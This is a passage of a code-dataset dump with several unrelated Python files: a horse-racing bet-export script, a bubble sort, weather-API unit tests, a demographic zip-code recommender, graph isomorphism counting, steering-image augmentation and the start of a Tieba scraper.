bet_df.loc[:, \"目3\"] =\"\"\n bet_df.loc[:, \"馬券式\"] = \"UMAREN\"\n bet_df.loc[:, \"券種\"] = '3'\n ipat_bet_df = self._get_ipatgo_bet_df(bet_df)\n target_bet_df = self._get_target_bet_df(bet_df)\n return ipat_bet_df, target_bet_df\n\n def get_umatan_bet_df(self, uma1_df, uma2_df):\n umatan_base_df = self.get_umatan_target_df(uma1_df, uma2_df)\n bet_df = umatan_base_df.query(\n \"勝_1 == '☆ ' and 印_1 in ['▲ ', '○ ', '◎ '] and 軸_2 in ['☆ ','▲ ', '○ ', '◎ '] and オッズ >= 50\").copy()\n bet_df.loc[:, \"コード\"] =bet_df.apply(lambda x: x[\"UMABAN_1\"] + \"-\" + x[\"UMABAN_2\"], axis=1)\n bet_df.loc[:, \"目1\"] =bet_df[\"UMABAN_1\"]\n bet_df.loc[:, \"目2\"] =bet_df[\"UMABAN_2\"]\n bet_df.loc[:, \"目3\"] =\"\"\n bet_df.loc[:, \"馬券式\"] = \"UMATAN\"\n bet_df.loc[:, \"券種\"] = '5'\n ipat_bet_df = self._get_ipatgo_bet_df(bet_df)\n target_bet_df = self._get_target_bet_df(bet_df)\n return ipat_bet_df, target_bet_df\n\n def get_wide_bet_df(self, uma1_df, uma2_df):\n wide_base_df = self.get_wide_target_df(uma1_df, uma2_df)\n bet_df = wide_base_df.query(\n \"印1 in ['▲ ', '○ ', '◎ '] and (軸1 != ' ' or 勝1 != ' ') and 軸2 in ['☆ ', '◎ '] and オッズ >= 20 and オッズ <= 100\").copy()\n bet_df.loc[:, \"コード\"] =bet_df.apply(lambda x: x[\"UMABAN_1\"] + \"-\" + x[\"UMABAN_2\"], axis=1)\n bet_df.loc[:, \"目1\"] =bet_df[\"UMABAN_1\"]\n bet_df.loc[:, \"目2\"] =bet_df[\"UMABAN_2\"]\n bet_df.loc[:, \"目3\"] =\"\"\n bet_df.loc[:, \"馬券式\"] = \"WIDE\"\n bet_df.loc[:, \"券種\"] = '4'\n ipat_bet_df = self._get_ipatgo_bet_df(bet_df)\n target_bet_df = self._get_target_bet_df(bet_df)\n return ipat_bet_df, target_bet_df\n\n def get_sanrenpuku_bet_df(self, uma1_df, uma2_df, uma3_df):\n sanrenpuku_base_df = self.get_sanrenpuku_target_df(uma1_df, uma2_df, uma3_df)\n bet_df = sanrenpuku_base_df.query(\n \"軸1 in ['☆ ', '▲ ', '○ ', '◎ '] and 印2 in ['△ ', '▲ ', '○ '] and 軸3 in ['▲ ', '○ ', '◎ '] and オッズ >= 50 and オッズ <= 150\").copy()\n bet_df.loc[:, \"コード\"] =bet_df.apply(lambda x: x[\"UMABAN_1\"] + \"-\" + x[\"UMABAN_2\"] + \"-\" + x[\"UMABAN_3\"], axis=1)\n bet_df.loc[:, \"目1\"] =bet_df[\"UMABAN_1\"]\n bet_df.loc[:, \"目2\"] =bet_df[\"UMABAN_2\"]\n bet_df.loc[:, \"目3\"] =bet_df[\"UMABAN_3\"]\n bet_df.loc[:, \"馬券式\"] = \"SANRENPUKU\"\n bet_df.loc[:, \"券種\"] = '6'\n ipat_bet_df = self._get_ipatgo_bet_df(bet_df)\n target_bet_df = self._get_target_bet_df(bet_df)\n return ipat_bet_df, target_bet_df\n\n def _get_ipatgo_bet_df(self, bet_df):\n bet_df[\"年月日\"] = bet_df[\"target_date\"]\n bet_df.loc[:, \"競馬場\"] = bet_df[\"RACE_KEY\"].apply(lambda x: self._convert_keibajo(x[0:2]))\n bet_df.loc[:, \"レース番号\"] = bet_df[\"RACE_KEY\"].str[6:8].astype(int)\n bet_df.loc[:, \"投票方式\"] = \"NORMAL\"\n bet_df.loc[:, \"マルチ\"] = \"MULTI\"\n bet_df.loc[:, \"金額\"] = 100\n bet_df = bet_df[[\"年月日\", \"競馬場\", \"レース番号\", \"馬券式\", \"投票方式\", \"マルチ\", \"コード\", \"金額\"]].copy()\n return bet_df\n\n def _get_target_bet_df(self, bet_df):\n bet_df = pd.merge(bet_df, self.ld.race_file_df, on=\"RACE_KEY\")\n bet_df.loc[:, \"変換フラグ\"] = 0\n bet_df.loc[:, \"購入金額\"] = 100\n bet_df.loc[:, \"的中時の配当\"] = 0\n bet_df.loc[:, \"エリア\"] = \"H\"\n bet_df.loc[:, \"マーク\"] = \"\"\n bet_df = bet_df[[\"RACE_ID\", \"変換フラグ\", \"券種\", \"目1\", \"目2\", \"目3\", \"購入金額\", \"オッズ\", \"的中時の配当\", \"エリア\", \"マーク\"]].copy()\n return bet_df\n\n def _convert_keibajo(self, str):\n if str == '01': return \"SAPPORO\"\n if str == '02': return \"HAKODATE\"\n if str == '03': return \"FUKUSHIMA\"\n if str == '04': return \"NIIGATA\"\n if str == '05': return \"TOKYO\"\n if str == '06': return \"NAKAYAMA\"\n if str == '07': return \"CHUKYO\"\n if str == '08': return \"KYOTO\"\n if str == '09': return \"HANSHIN\"\n if str == '10': return \"KOKURA\"\n\n def export_pbi_data(self):\n race_df = self.ld.race_df.copy()\n race_df.loc[:, \"場名\"] = race_df[\"場名\"].apply(lambda x: mu.convert_basho(x))\n race_df.loc[:, \"レースNo\"] = race_df[\"RACE_KEY\"].str[6:8]\n race_df.loc[:, \"種別\"] = race_df[\"種別\"].apply(lambda x: mu.convert_shubetsu(x))\n race_df.loc[:, \"条件\"] = race_df[\"条件\"].apply(lambda x: self._convert_joken(x))\n race_df.loc[:, \"芝ダ\"] = race_df[\"芝ダ障害コード\"].apply(lambda x: mu.convert_shida(x))\n race_df.loc[:, \"コース名\"] = race_df.apply(lambda x: self._get_course_name(x), axis=1)\n race_df = pd.merge(race_df, self.ld.race_file_df[[\"RACE_KEY\", \"RACE_ID\"]], on=\"RACE_KEY\")\n race_df = race_df[[\"RACE_ID\", \"RACE_KEY\", \"場名\", \"レースNo\", \"距離\", \"芝ダ\", \"種別\", \"条件\", \"target_date\", \"コース名\"]].copy()\n race_df.to_csv(self.auto_bet_path + \"race.csv\", index=False, header=True)\n raceuma_df = self.ld.ext.get_raceuma_before_table_base()[[\"RACE_KEY\", \"UMABAN\", \"基準オッズ\", \"騎手名\", \"調教師名\", \"馬名\"]].copy()\n raceuma_df = pd.merge(raceuma_df, self.target_mark_df, on=[\"RACE_KEY\", \"UMABAN\"])\n raceuma_df.to_csv(self.auto_bet_path + \"raceuma.csv\", index=False, header=True)\n\n def _convert_joken(self, joken):\n if joken == 1: return \"A1\"\n if joken == 2: return \"A2\"\n if joken == 3: return \"A3\"\n if joken == 99: return \"OP\"\n if joken == 5: return \"500万下\"\n if joken == 10: return \"1000万下\"\n if joken == 16: return \"1600万下\"\n else: return \"\"\n\n def _get_course_name(self, sr):\n soto = \"外\" if sr[\"内外\"] == \"2\" else \"\"\n return sr[\"場名\"] + sr[\"芝ダ\"] + str(sr[\"距離\"]) +\"m\" + soto\n\nclass Sokuho(object):\n def __init__(self, target_date, test_flag):\n self.ext = Ext(target_date, target_date, test_flag)\n self.dict_path = mc.return_jra_path(test_flag)\n self.target_path = mc.TARGET_PATH\n self.auto_bet_path = self.target_path + 'AUTO_BET/'\n\n def export_pbi_real_data(self):\n jrdb = JrdbDownload()\n jrdb.procedure_download_sokuho()\n filelist = os.listdir(self.dict_path + \"jrdb_data/sokuho/\")\n for file in filelist:\n if file[0:3] == \"SED\":\n temp_df = self.ext.get_sed_sokuho_df(file)\n temp_df.to_csv(self.auto_bet_path + \"result.csv\", index=False, header=True)\n #elif file[0:3] == \"TYB\":\n # temp_df = self.ext.get_tyb_sokuho_df(file)\n # elif file[0:3] == \"SRB\":\n # temp_df = self.ext.get_srb_sokuho_df(file)\n elif file[0:3] == \"HJC\":\n temp_df = self.ext.get_hjc_sokuho_df(file)\n dict_haraimodoshi = self.ext.get_haraimodoshi_dict(temp_df)\n tansho_df = dict_haraimodoshi[\"tansho_df\"]\n tansho_df.loc[:, \"NENGAPPI\"] = \"20\" + file[3:9]\n tansho_df.loc[:, \"RACE_ID\"] = tansho_df.apply(lambda x: mu.convert_jrdb_id(x[\"RACE_KEY\"], x[\"NENGAPPI\"]), axis=1)\n tansho_df.to_csv(self.auto_bet_path + \"tansho.csv\", index=False, header=True)\n fukusho_df = dict_haraimodoshi[\"fukusho_df\"]\n fukusho_df.loc[:, \"NENGAPPI\"] = \"20\" + file[3:9]\n fukusho_df.loc[:, \"RACE_ID\"] = fukusho_df.apply(lambda x: mu.convert_jrdb_id(x[\"RACE_KEY\"], x[\"NENGAPPI\"]), axis=1)\n fukusho_df.to_csv(self.auto_bet_path + \"fukusho.csv\", index=False, header=True)\n umaren_df = dict_haraimodoshi[\"umaren_df\"]\n umaren_df.loc[:, \"NENGAPPI\"] = \"20\" + file[3:9]\n umaren_df.loc[:, \"RACE_ID\"] = umaren_df.apply(lambda x: mu.convert_jrdb_id(x[\"RACE_KEY\"], x[\"NENGAPPI\"]), axis=1)\n umaren_df.loc[:, \"馬1\"] = umaren_df[\"UMABAN\"].apply(lambda x: int(x[0]))\n umaren_df.loc[:, \"馬2\"] = umaren_df[\"UMABAN\"].apply(lambda x: int(x[1]))\n umaren_df.to_csv(self.auto_bet_path + \"umaren.csv\", index=False, header=True)\n wide_df = dict_haraimodoshi[\"wide_df\"]\n wide_df.loc[:, \"NENGAPPI\"] = \"20\" + file[3:9]\n wide_df.loc[:, \"RACE_ID\"] = wide_df.apply(lambda x: mu.convert_jrdb_id(x[\"RACE_KEY\"], x[\"NENGAPPI\"]), axis=1)\n wide_df.loc[:, \"馬1\"] = wide_df[\"UMABAN\"].apply(lambda x: int(x[0]))\n wide_df.loc[:, \"馬2\"] = wide_df[\"UMABAN\"].apply(lambda x: int(x[1]))\n wide_df.to_csv(self.auto_bet_path + \"wide.csv\", index=False, header=True)\n umatan_df = dict_haraimodoshi[\"umatan_df\"]\n umatan_df.loc[:, \"NENGAPPI\"] = \"20\" + file[3:9]\n umatan_df.loc[:, \"RACE_ID\"] = umatan_df.apply(lambda x: mu.convert_jrdb_id(x[\"RACE_KEY\"], x[\"NENGAPPI\"]), axis=1)\n umatan_df.loc[:, \"馬1\"] = umatan_df[\"UMABAN\"].apply(lambda x: int(x[0]))\n umatan_df.loc[:, \"馬2\"] = umatan_df[\"UMABAN\"].apply(lambda x: int(x[1]))\n umatan_df.to_csv(self.auto_bet_path + \"umatan.csv\", index=False, header=True)\n sanrenpuku_df = dict_haraimodoshi[\"sanrenpuku_df\"]\n sanrenpuku_df.loc[:, \"NENGAPPI\"] = \"20\" + file[3:9]\n sanrenpuku_df.loc[:, \"RACE_ID\"] = sanrenpuku_df.apply(lambda x: mu.convert_jrdb_id(x[\"RACE_KEY\"], x[\"NENGAPPI\"]), axis=1)\n sanrenpuku_df.loc[:, \"馬1\"] = sanrenpuku_df[\"UMABAN\"].apply(lambda x: int(x[0]))\n sanrenpuku_df.loc[:, \"馬2\"] = sanrenpuku_df[\"UMABAN\"].apply(lambda x: int(x[1]))\n sanrenpuku_df.loc[:, \"馬3\"] = sanrenpuku_df[\"UMABAN\"].apply(lambda x: int(x[2]))\n sanrenpuku_df.to_csv(self.auto_bet_path + \"sanrenpuku.csv\", index=False, header=True)\n else:\n continue\n\n\nif __name__ == \"__main__\":\n args = sys.argv\n print(args)\n print(\"mode:\" + args[1]) # test or init or prod\n mock_flag = False\n test_flag = False\n mode = args[1]\n dict_path = mc.return_jra_path(test_flag)\n version_str = \"dummy\" #dict_folderを取得するのに使用\n pd.set_option('display.max_columns', 3000)\n pd.set_option('display.max_rows', 3000)\n if mode == \"test\":\n print(\"Test mode\")\n start_date = '2020/01/01'\n # end_date = '2020/05/31'\n end_date = (dt.now() + timedelta(days=1)).strftime('%Y/%m/%d')\n term_start_date = '20200501'\n term_end_date = '20200531'\n elif mode == \"init\":\n start_date = '2019/01/01'\n end_date = (dt.now() + timedelta(days=1)).strftime('%Y/%m/%d')\n term_start_date = '20190101'\n term_end_date = (dt.now() + timedelta(days=1)).strftime('%Y%m%d')\n elif mode == \"prod\":\n start_date = (dt.now() + timedelta(days=-90)).strftime('%Y/%m/%d')\n end_date = (dt.now() + timedelta(days=1)).strftime('%Y/%m/%d')\n term_start_date = (dt.now() + timedelta(days=-9)).strftime('%Y%m%d')\n term_end_date = (dt.now() + timedelta(days=1)).strftime('%Y%m%d')\n elif mode == \"sokuho\":\n start_date = (dt.now() + timedelta(days=-90)).strftime('%Y/%m/%d')\n end_date = (dt.now() + timedelta(days=1)).strftime('%Y/%m/%d')\n term_start_date = (dt.now()).strftime('%Y%m%d')\n term_end_date = (dt.now()).strftime('%Y%m%d')\n sokuho = Sokuho(end_date, test_flag)\n sokuho.export_pbi_real_data()\n\n print(\"MODE:\" + str(args[1]) + \" update_start_date:\" + term_start_date + \" update_end_date:\" + term_end_date)\n\n av = AutoVote(start_date, end_date, term_start_date, term_end_date, test_flag)\n av.export_bet_csv()\n av.export_pbi_data()\n","sub_path":"scripts/jra_auto_vote.py","file_name":"jra_auto_vote.py","file_ext":"py","file_size_in_byte":44427,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"39945108","text":"#6, 3, 8, 2, 9, 1 这么一组数据,每次冒泡把最大的放到最后去,几轮之后就是按照从小到大排序了\n#参考onedrive里的FireShot Capture 2 - php四排序-冒泡排序\n\narr = [6, 3, 8, 2, 9, 1]\nnum = len(arr)\n\nfor i in range(num - 1):#控制轮数\n\tl = i + 1\n\tneedChange = 0\n\tfor j in range(num - l):#控制每轮的比较次数\n\t\tprint(l, j)#l代表第几轮,j从0开始,用j与j+1进行比较\n\t\tif(arr[j + 1] < arr[j]):\n\t\t\ttmp = arr[j]\n\t\t\tarr[j] = arr[j + 1]\n\t\t\tarr[j + 1] = tmp\n\t\t\tneedChange = 1\n\tif not needChange:\n\t\tbreak\n\nprint(arr)\n\t\t","sub_path":"sort_bubble.py","file_name":"sort_bubble.py","file_ext":"py","file_size_in_byte":572,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"283730380","text":"import requests\r\nimport unittest\r\n\r\nclass TestWeather(unittest.TestCase):\r\n '''天气接口'''\r\n def test_01(self):\r\n '''成功案例:time=2019-04-05, city=上海'''\r\n url = \"http://47.104.190.48:8000/weather_json/\"\r\n par = {\r\n \"time\": \"2019-04-05\",\r\n \"city\": \"上海\"\r\n }\r\n r = requests.get(url, params=par)\r\n print(r.text) # 确认是不是json\r\n reason = r.json()['reason']\r\n print(reason) # 实际结果\r\n exp = \"success\" # 期望结果\r\n # assert reason==exp\r\n self.assertTrue(reason==exp) # 断言\r\n\r\n def test_02(self):\r\n '''失败案例:time=2019-04-, city=上海'''\r\n url = \"http://47.104.190.48:8000/weather_json/\"\r\n par = {\r\n \"time\": \"2019-04-\",\r\n \"city\": \"上海\"\r\n }\r\n r = requests.get(url, params=par)\r\n print(r.text) # 确认是不是json\r\n reason = r.json()['reason']\r\n print(reason) # 实际结果\r\n exp = \"时间格式不对\" # 期望结果\r\n self.assertTrue(exp in reason)\r\n\r\nif __name__ == '__main__':\r\n unittest.main()\r\n\r\n\r\n","sub_path":"APITestProject/cases/model2/test_weather.py","file_name":"test_weather.py","file_ext":"py","file_size_in_byte":1165,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"477456532","text":"__author__ = 'zelengzhuang'\n\nfrom rcmOnFacts.RcmSystem.tools import cos\nfrom rcmOnFacts.models import cityData\n\nclass algorithm:\n @staticmethod\n def rcmdtion (input, sessionVal):\n gender = int (input ['gender'])\n marriage = int (input ['marriage'])\n race = int (input ['race'])\n sexo = int (input ['sexorient'])\n rentbuy = int (input ['rentbuy'])\n education = int (input ['education'])\n subChoice = int (input ['submitType'])\n\n if gender == 1:\n target = {\n 'malePercentage': 0,\n 'femalePercentage': 1\n }\n elif gender == 2:\n target = {\n 'malePercentage': 0.5,\n 'femalePercentage': 0.5\n }\n else:\n target = {\n 'malePercentage': 1,\n 'femalePercentage': 0\n }\n if marriage == 1:\n target ['neverMarried'] = 1\n target ['nowMarried'] = 0\n target ['seperated'] = 0\n target ['divorced'] = 0\n target ['widowed'] = 0\n elif marriage == 2:\n target ['neverMarried'] = 0\n target ['nowMarried'] = 1\n target ['seperated'] = 0\n target ['divorced'] = 0\n target ['widowed'] = 0\n elif marriage == 3:\n target ['neverMarried'] = 0\n target ['nowMarried'] = 0\n target ['seperated'] = 1\n target ['divorced'] = 0\n target ['widowed'] = 0\n elif marriage == 4:\n target ['neverMarried'] = 0\n target ['nowMarried'] = 0\n target ['seperated'] = 0\n target ['divorced'] = 1\n target ['widowed'] = 0\n elif marriage == 5:\n target ['neverMarried'] = 0\n target ['nowMarried'] = 0\n target ['seperated'] = 0\n target ['divorced'] = 0\n target ['widowed'] = 1\n elif marriage == 6:\n target ['neverMarried'] = 0.2\n target ['nowMarried'] = 0.2\n target ['seperated'] = 0.2\n target ['divorced'] = 0.2\n target ['widowed'] = 0.2\n\n if race == 1:\n target ['white'] = 1\n target ['black'] = 0\n target ['americanIndian'] = 0\n target ['asian'] = 0\n target ['hispanic'] = 0\n target ['hawaiian'] = 0\n target ['twoOrMore'] = 0\n target ['otherRace'] = 0\n elif race == 2:\n target ['white'] = 0\n target ['black'] = 1\n target ['americanIndian'] = 0\n target ['asian'] = 0\n target ['hispanic'] = 0\n target ['hawaiian'] = 0\n target ['twoOrMore'] = 0\n target ['otherRace'] = 0\n elif race == 3:\n target ['white'] = 0\n target ['black'] = 0\n target ['americanIndian'] = 1\n target ['asian'] = 0\n target ['hispanic'] = 0\n target ['hawaiian'] = 0\n target ['twoOrMore'] = 0\n target ['otherRace'] = 0\n elif race == 4:\n target ['white'] = 0\n target ['black'] = 0\n target ['americanIndian'] = 0\n target ['asian'] = 1\n target ['hispanic'] = 0\n target ['hawaiian'] = 0\n target ['twoOrMore'] = 0\n target ['otherRace'] = 0\n elif race == 5:\n target ['white'] = 0\n target ['black'] = 0\n target ['americanIndian'] = 0\n target ['asian'] = 0\n target ['hispanic'] = 1\n target ['hawaiian'] = 0\n target ['twoOrMore'] = 0\n target ['otherRace'] = 0\n elif race == 6:\n target ['white'] = 0\n target ['black'] = 0\n target ['americanIndian'] = 0\n target ['asian'] = 0\n target ['hispanic'] = 0\n target ['hawaiian'] = 1\n target ['twoOrMore'] = 0\n target ['otherRace'] = 0\n elif race == 7:\n target ['white'] = 0\n target ['black'] = 0\n target ['americanIndian'] = 0\n target ['asian'] = 0\n target ['hispanic'] = 0\n target ['hawaiian'] = 0\n target ['twoOrMore'] = 1\n target ['otherRace'] = 0\n elif race == 8:\n target ['white'] = 0\n target ['black'] = 0\n target ['americanIndian'] = 0\n target ['asian'] = 0\n target ['hispanic'] = 0\n target ['hawaiian'] = 0\n target ['twoOrMore'] = 0\n target ['otherRace'] = 1\n\n if sexo == 1:\n target ['gay'] = 1\n target ['lesbian'] = 0\n target ['malePercentage'] = 1\n target ['femalePercentage'] = 0\n elif sexo == 2:\n target ['gay'] = 0\n target ['lesbian'] = 1\n target ['malePercentage'] = 0\n target ['femalePercentage'] = 1\n elif sexo == 3:\n target ['gay'] = 0\n target ['lesbian'] = 0\n elif sexo == 4:\n target ['gay'] = 0.5\n target ['lesbian'] = 0.5\n\n if rentbuy == 1:\n target ['rent'] = 1\n target ['buy'] = 0\n elif rentbuy == 2:\n target ['rent'] = 0\n target ['buy'] = 1\n elif rentbuy == 3:\n target ['rent'] = 0.5\n target ['buy'] = 0.5\n\n\n if education == 1:\n target ['noEducation'] = 1\n target ['highSchool'] = 0\n target ['bachelor'] = 0\n target ['master'] = 0\n elif education == 2:\n target ['noEducation'] = 0\n target ['highSchool'] = 1\n target ['bachelor'] = 0\n target ['master'] = 0\n elif education == 3:\n target ['noEducation'] = 0\n target ['highSchool'] = 0\n target ['bachelor'] = 1\n target ['master'] = 0\n elif education == 4:\n target ['noEducation'] = 0\n target ['highSchool'] = 0\n target ['bachelor'] = 0\n target ['master'] = 1\n elif education == 5:\n target ['noEducation'] = 0.5\n target ['highSchool'] = 0.5\n target ['bachelor'] = 0.5\n target ['master'] = 0.5\n\n assert (len (target.keys()) == 23)\n res = []\n resSimilarityOnly = []\n for i in cityData.objects.all():\n simlarity = float(\"{0:3.03f}\".format(cos(i, target, target.keys())))\n simlaritySecondRound = 0\n if subChoice == 1:\n for j in sessionVal:\n if j ['zip'] == i.zipCode:\n simlaritySecondRound = j ['simlarity']\n break\n tmp = {\n 'zipThing': i,\n 'simlarity': simlarity\n }\n if subChoice == 1:\n tmp ['simlaritySecondRound'] = simlaritySecondRound\n tmpNew = {\n 'zip': i.zipCode,\n 'simlarity': simlarity\n }\n res.append(tmp)\n resSimilarityOnly.append(tmpNew)\n if subChoice == 2:\n res.sort(key=lambda zipObj: zipObj [\"simlarity\"], reverse=True)\n else:\n res.sort(key=lambda zipObj: zipObj [\"simlarity\"] + zipObj [\"simlaritySecondRound\"], reverse=True)\n resSimilarityOnly.sort(key=lambda zipObj: zipObj [\"simlarity\"], reverse=True)\n ret = (res, resSimilarityOnly)\n return ret\n","sub_path":"Website/community/rcmOnFacts/RcmSystem/rcmAlgorithm.py","file_name":"rcmAlgorithm.py","file_ext":"py","file_size_in_byte":7577,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"364482396","text":"import matplotlib.pyplot as plt\nimport numpy as np\nfrom random import random, randint\nimport cv2\nimport os\n\nLOWER_IND = 60\nUPPER_IND = 135\nSTEER_BIAS = 0.23\nTRANS = 100\n\ndef remove_small_steering(data,thresh=0.05,drop_ratio=0.8):\n \"\"\" remove angles that are smaller than thresh randomly, drop_ratio determines fraction\n of small angles to drop\n \"\"\"\n index = data[abs(data['steer']) highest_label:\n highest_label = degree\n\n return color_refine(graph, highest_label)\n\ndef fast_colour_graph(graph):\n buckets = {}\n\n for n in graph.get_nodes():\n degree = n.get_degree()\n if degree not in buckets:\n buckets[degree] = set()\n buckets[degree].add(n)\n\n return fast_colour_refine(graph, list(buckets.values()))\n\ndef get_color_set(graph):\n colors = {}\n\n for n in graph.get_nodes():\n label = n.get_label()\n if label in colors:\n colors[label] += 1\n else:\n colors[label] = 1\n\n return colors\n\ndef fast_count_isomorphisms(graph1, graph2):\n graph1 = graph1.deep_copy()\n graph2 = graph2.deep_copy()\n graph = graph1 + graph2\n classes = fast_colour_graph(graph)\n\n def count_recursive(classes):\n bijection = True\n branch = None\n branch_cls = None\n\n for cls in classes:\n left = set()\n right = set()\n\n for node in cls:\n if node in graph1.get_nodes():\n left.add(node)\n else:\n right.add(node)\n\n if len(left) != len(right):\n return 0\n\n if len(left) != 1:\n bijection = False\n branch = left, right\n branch_cls = cls\n\n if bijection:\n return 1\n\n left, right = branch\n x = left.pop()\n branch_cls.remove(x)\n total = 0\n\n for y in right:\n branch_cls.remove(y)\n\n new_class = {x, y}\n total += count_recursive(fast_colour_refine(graph, [ cls.copy() for cls in classes ] + [new_class], stack=[new_class]))\n\n branch_cls.add(y)\n\n branch_cls.add(x)\n return total\n return count_recursive(classes)\n\ndef fast_check_isomorphism(graph1, graph2):\n graph1 = graph1.deep_copy()\n graph2 = graph2.deep_copy()\n graph = graph1 + graph2\n classes = fast_colour_graph(graph)\n\n def check_recursive(classes):\n bijection = True\n branch = None\n branch_cls = None\n\n for cls in classes:\n left = set()\n right = set()\n\n for node in cls:\n if node in graph1.get_nodes():\n left.add(node)\n else:\n right.add(node)\n\n if len(left) != len(right):\n return 0\n\n if len(left) != 1:\n bijection = False\n branch = left, right\n branch_cls = cls\n\n if bijection:\n return 1\n\n left, right = branch\n x = left.pop()\n branch_cls.remove(x)\n\n for y in right:\n branch_cls.remove(y)\n\n new_class = {x, y}\n if check_recursive(fast_colour_refine(graph, [ cls.copy() for cls in classes ] + [new_class], stack=[new_class])):\n return True\n\n branch_cls.add(y)\n\n branch_cls.add(x)\n return False\n\n return check_recursive(classes)\n\ndef count_isomorphisms(graph1, graph2):\n graph1 = graph1.deep_copy()\n graph2 = graph2.deep_copy()\n graph = graph1 + graph2\n highest_label = color_graph(graph)\n\n def count_recursive(graph1, graph2, highest_label):\n colors1 = get_color_set(graph1)\n colors2 = get_color_set(graph2)\n\n if list(sorted(colors1.keys())) != list(sorted(colors2.keys())):\n return 0\n\n for k, v in colors1.items():\n if v != colors2[k]:\n return 0 # Unbalanced\n\n if all(map(lambda count: count == 1, colors1.values())):\n return 1 # Already a bijection\n\n # Not a bijection, so find a color to branch on\n for color, count in colors1.items():\n if count > 1:\n break\n\n total = 0 # Total number of isomorphisms\n\n # Find an arbitrary node that has the selected color in the left graph\n for x in graph1.get_nodes():\n if x.get_label() == color:\n break\n\n # Give the node a new color\n highest_label += 1\n new_label = highest_label\n x.set_label(new_label)\n\n # Iterate over all nodes in the right graph and change one of the nodes (i.e. y) to have the same color as x\n # This spans all isomorphisms, since we select a specific mapping for x on y, from all possible mappings.\n for y in graph2.get_nodes():\n if y.get_label() != color:\n continue\n\n y.set_label(new_label)\n\n cloned_graph1 = graph1.deep_copy()\n cloned_graph2 = graph2.deep_copy()\n\n cloned_graph = cloned_graph1 + cloned_graph2\n\n # Refine the disjoint union of the graphs again, since we added a new color\n new_highest_label = color_refine(cloned_graph, highest_label)\n\n total += count_recursive(cloned_graph1, cloned_graph2, new_highest_label)\n\n y.set_label(color)\n\n x.set_label(color)\n\n return total\n\n return count_recursive(graph1, graph2, highest_label)\n\n\ndef get_labels(n):\n neighbours_labels = []\n\n for neighbour in n.get_neighbours():\n neighbours_labels.append(neighbour.get_label())\n\n return tuple(sorted(neighbours_labels))\n\n\ndef color_refine(graph, highest_label):\n done = False\n\n while not done:\n done = True\n\n to_change = []\n labels = {}\n assigned = set()\n\n for n in graph.get_nodes():\n neighbours_labels = (n.get_label(), get_labels(n))\n\n if neighbours_labels not in labels:\n if n.get_label() in assigned:\n highest_label += 1\n labels[neighbours_labels] = highest_label\n done = False\n else:\n labels[neighbours_labels] = n.get_label()\n assigned.add(n.get_label())\n\n to_change.append((n, labels[neighbours_labels]))\n\n for node, label in to_change:\n node.set_label(label)\n\n return highest_label\n\ndef fast_colour_refine(graph, current_classes, stack=None):\n # Onthoudt wat nog vergeleken moet worden met alle andere groepen\n if stack is None:\n stack = [ cls for cls in current_classes ]\n # Kleur\n while stack:\n refining_set = stack.pop()\n to_add = []\n for cls in current_classes:\n buckets = {}\n # Splits in classes\n for node in cls:\n no_conn = 0\n for neighbour in node.get_neighbours():\n if neighbour in refining_set:\n no_conn += 1\n if no_conn not in buckets:\n buckets[no_conn] = set()\n buckets[no_conn].add(node)\n max_bucket_key = max(buckets.keys(), key=lambda k: len(buckets[k]))\n bucket = buckets.pop(max_bucket_key)\n cls.clear()\n cls |= bucket\n # alle andere buckets als class toevoegen (zijn al sets) dus zijn al de kleurklasse\n for bucket in buckets.values():\n stack.append(bucket)\n to_add.append(bucket)\n current_classes += to_add\n return current_classes\n\n\n #Kies 1 klasse en kleur deze verder\n #iets recursiefs hier doen\n\n\ndef maximum_clique(graph):\n def clique(U, size, cur_max):\n if len(U) == 0:\n return max(size, cur_max)\n\n while len(U) > 0:\n if size + len(U) <= cur_max:\n return cur_max\n\n v = min(U, key=lambda u: u.get_label())\n\n if size + c[v.get_label()] <= cur_max:\n return cur_max\n\n U.remove(v)\n\n result = clique({ neighbour for neighbour in v.get_neighbours() if neighbour in U }, size + 1, cur_max)\n if result > cur_max:\n return result\n\n return cur_max\n\n S = set()\n c = {}\n nodes = list(graph.get_nodes())\n\n for i, node in enumerate(nodes):\n node.set_label(i)\n\n for i, node in reversed(list(enumerate(nodes))):\n S.add(node)\n cur_max = clique({ neighbour for neighbour in node.get_neighbours() if neighbour in S }, 1, c[i+1] if (i+1) in c else 0)\n c[i] = cur_max\n\n return c[0]\n\n# if __name__ == \"__main__\":\n# path = sys.argv[1]\n# f = open(path)\n# graph = basic.Graph.read_from_file(f)\n#\n# print(maximum_clique(graph))\n\nif __name__ == \"__main__\":\n path = sys.argv[1]\n f = open(path)\n graphs = basic.Graph.read_from_list_file(open(path))\n print(\"=== {} ===\".format(path), file=sys.stderr)\n if len(sys.argv) > 2:\n isomorphism_sets = []\n\n for i, g in enumerate(graphs):\n for isomorphic_graphs in isomorphism_sets:\n print(\"(Checking {} and {})\".format(i, isomorphic_graphs[0]), file=sys.stderr)\n if fast_check_isomorphism(g, graphs[isomorphic_graphs[0]]):\n isomorphic_graphs.append(i)\n break\n else:\n isomorphism_sets.append([i])\n\n print(\"Sets of isomorphic graphs:\")\n for isomorphic_graphs in isomorphism_sets:\n print(\"{}\".format(isomorphic_graphs))\n else:\n isomorphism_sets = []\n\n for i, g in enumerate(graphs):\n for count, isomorphic_graphs in isomorphism_sets:\n print(\"(Checking {} and {})\".format(i, isomorphic_graphs[0]), file=sys.stderr)\n if fast_check_isomorphism(g, graphs[isomorphic_graphs[0]]):\n isomorphic_graphs.append(i)\n break\n else:\n print(\"(Counting {} and {})\".format(i, i), file=sys.stderr)\n count = fast_count_isomorphisms(g, g)\n isomorphism_sets.append((count, [i]))\n\n print(\"Sets of isomorphic graphs:\\tNumber of automorphisms:\")\n for count, isomorphic_graphs in isomorphism_sets:\n print(\"{}\\t\\t\\t\\t\\t\\t{}\".format(isomorphic_graphs, count))\n","sub_path":"color_refinement.py","file_name":"color_refinement.py","file_ext":"py","file_size_in_byte":10190,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"515178877","text":"import requests\nimport re\n\n'''\n# @Date : 2018-01-17 16:33:06\n# @Author : zlz (codecool97@gmail.com)\n# @Link : https://www.codedraw.cn\n'''\n\nclass BDTB:\n\n def __init__(self):\n self.baseURL = \"https://tieba.baidu.com/p/\"\n 